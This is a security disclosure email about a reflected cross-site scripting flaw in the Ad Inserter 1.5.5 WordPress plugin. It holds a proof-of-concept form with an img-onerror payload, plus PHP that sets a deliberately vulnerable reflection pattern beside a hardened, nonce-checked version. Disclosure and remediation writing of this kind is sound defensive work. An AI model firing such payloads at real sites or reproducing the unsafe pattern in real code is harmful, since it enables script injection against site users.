Subject: Cross-Site Scripting (XSS) in Ad Inserter 1.5.5
Date: Thu, 13 Aug 2015 12:06:59 +0200

Hello,

Plugin: Ad Inserter 1.5.5 https://wordpress.org/plugins/ad-inserter/

1. Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code via the settings form; the form has no CSRF protection (no nonce check), so the request is not tied to an action the administrator intended.

Method: POST
URL: http://localhost/wp-admin/options-general.php?page=ad-inserter.php
Vulnerable parameter: ai-active-tab

Example PHP callstack:
ai_settings   [/ad-inserter/ad-inserter.php:696]
print_settings_form   [/ad-inserter/settings.php:516]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=ad-inserter.php">
<input type="text" name="ai-active-tab" value='"><img src=x onerror=alert(1) />'>
<input type="submit" />
</form>
--
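The reflection pattern the advisory describes (the submitted tab name echoed back into an attribute), next to a hardened handler, as an added example that is not the plugin's code. The function names and the list of tab ids are assumptions; only the WordPress API calls (check_admin_referer, wp_nonce_field, esc_attr) are real.

```php
<?php
// Added example, not code from Ad Inserter. Everything except the WordPress
// API (check_admin_referer, wp_nonce_field, esc_attr) is hypothetical.

// Vulnerable pattern: the submitted value is written straight into an
// attribute, so a value such as  "><img src=x onerror=alert(1) />  closes
// the attribute and the tag and is rendered as markup.
function render_active_tab_unsafe() {
    $tab = isset($_POST['ai-active-tab']) ? $_POST['ai-active-tab'] : '1';
    echo '<input type="hidden" name="ai-active-tab" value="' . $tab . '">';
}

// Hardened pattern:
//  1. on POST, require a valid nonce for this form (stops CSRF);
//  2. accept only a known tab identifier (allow-list);
//  3. escape whatever is echoed into an attribute (esc_attr) as defence in depth.
function render_active_tab_safe() {
    $allowed_tabs = array('1', '2', '3', '4');   // hypothetical tab ids

    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        // Terminates the request if the nonce is missing or invalid.
        check_admin_referer('ai_settings_save', 'ai_settings_nonce');
    }

    $tab = isset($_POST['ai-active-tab']) ? (string) $_POST['ai-active-tab'] : '1';
    if (!in_array($tab, $allowed_tabs, true)) {
        $tab = '1';                               // unknown value: safe default
    }

    echo '<form method="post">';
    wp_nonce_field('ai_settings_save', 'ai_settings_nonce'); // hidden nonce field
    echo '<input type="hidden" name="ai-active-tab" value="' . esc_attr($tab) . '">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}
```

With the allow-list in place the escaping never sees attacker-controlled text, but keeping esc_attr on every attribute write is what protects the next parameter someone adds to the form.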


--
Regards,
Marcin Probola,